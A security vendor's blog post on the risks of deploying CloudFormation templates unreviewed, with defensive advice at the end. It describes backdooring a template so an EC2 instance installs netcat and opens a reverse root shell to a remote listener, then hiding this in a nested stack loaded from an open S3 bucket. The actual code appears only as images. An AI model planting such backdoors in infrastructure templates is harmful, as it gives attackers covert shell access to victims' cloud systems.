Skip to main content

CloudFormation Templates: What’s in that Stack?

October 11, 2019

What would happen if someone provisioned a stack from a blog post that created new identity access management (IAM) roles, disabled logging services or created new security groups? Would you know?

In preparation for a research project I needed to create the AWS infrastructure that would be used to run Docker, Kubernets and our containerized app. I also needed to enable and configure multiple AWS resources, which included EC2 instances, SecurityGroups, Subnets and IAM Roles. With a working knowledge of the basic resources needed for the project I turned to Google in the hope of locating an example. I quickly stumbled upon a few helpful CloudFormation templates (CFTs) from someone who had undertaken a similar project.

CloudFormation templates can be used to spin up individual resources or entire environments. The templates are text files and are commonly formatted in json, yaml or template. Templates define the properties of the resource(s) a user seeks to provision. These templates are managed, updated and deployed as a unit known as a stack. After a formation template is written, it can be used in other AWS environments simply by changing a few resource parameters.

To launch the CloudFormation template I located in my Google search all I had to do was click a button to the blog post, which then pivoted into my AWS management console and began the deployment.

Launch Stack

Easy, right? All too easy.

Once the underlying infrastructure of the project was provisioned and working, I went back and took a deeper look at one of the templates and wondered what the file was doing. I provisioned first and asked questions later.

Not the best idea.

Scrolling through the yaml file I saw code that had the EC2 instance installing and executing commands as part of the provisioning process.

CloudFormation Image 1

My curiosity was piqued. How easy would it be to backdoor a CloudFormation template? I decided to add two commands to the CFT: the first installs nmap-ncat and the second uses netcat to connect to a remote listener.

CloudFormation Image 2

Upon creation of the stack, I now had a working EC2 instance, but there was already a remote root shell connection.

CloudFormation Image 3

Great, but somewhat obvious to anyone who took a second to glance at the CFT. How could I hide the malicious commands from the user? AWS CFT allows for nested stacks. The top-level stack is called a root stack. A root stack can have one or more nested stacks beneath it that provision additional resources.

The image below shows that root stack calls a nested stack for the resource GitlabInstance. The nested stack uses another CFT template located on an open S3 bucket.

CloudFormation Image 5

As before, the complete stack is deployed using the AWS console and success. The formation template spins up a working EC2 instance that connects back to the listener.

CloudFormation Image 6

Conclusion: CFTs need to be analyzed first.

This is an example of a basic formation template attack. It’s opportunistic and it would be very hard to target a specific organization in this manner, but it clearly illustrates that CloudFormation templates (CFTs) need to be analyzed prior to deployment.

We suggest prevention tools.

From a security perspective it is critical to understand the actions within the formation template before it is deployed. If there are nested stacks being called, they need to be analyzed as well.

Analyze what resources are being provisioned, what they’re used for and if the resources are labeled. For example, if a security group is created look closely at inbound and outbound rules. Most CFTs I’ve seen only create security groups that lock down incoming connections, leaving outbound wide open. This was the case for the formation template used in the example above.

Make sure users deploying the formation templates don’t have overly permissive permissions. If the formation templates are compromised, then users may not have the appropriate resources to deploy malicious resources.

Several cybersecurity solution providers have the ability to scan formation templates for malicious behavior. Use them.


    Dan Kiraly

By: Dan Kiraly

Senior Research Analyst

See More

Related Blogs

September 04, 2019

Service Providers and PCI Compliance, Part 1 – Cloud Services and Your Obligations

This post is the first in a three-part series dedicated to companies working with service providers relating to PCI compliance. Part 1 below focuses o...

See Details

June 08, 2018

The Business Trusts the Third Party – Should You?

In this day and age we are faced with some hard facts within information security. One of those facts is that breaches are imminent and we must be pre...

See Details

October 01, 2019

Service Providers and PCI Compliance, Part 2 – Third-Party Risk Management

In this post, Service Providers and PCI Compliance, Part 2 – Third-Party Risk Management, we look more closely at the relationships between organizati...

See Details

How Can We Help?

Let us know what you need, and we will have an Optiv professional contact you shortly.


Privacy Policy

Stay in the Know

For all the latest cybersecurity and Optiv news, subscribe to our blog and connect with us on Social.

Subscribe

Join our Email List

We take your privacy seriously and promise never to share your email with anyone.

Stay Connected

Find cybersecurity Events in your area.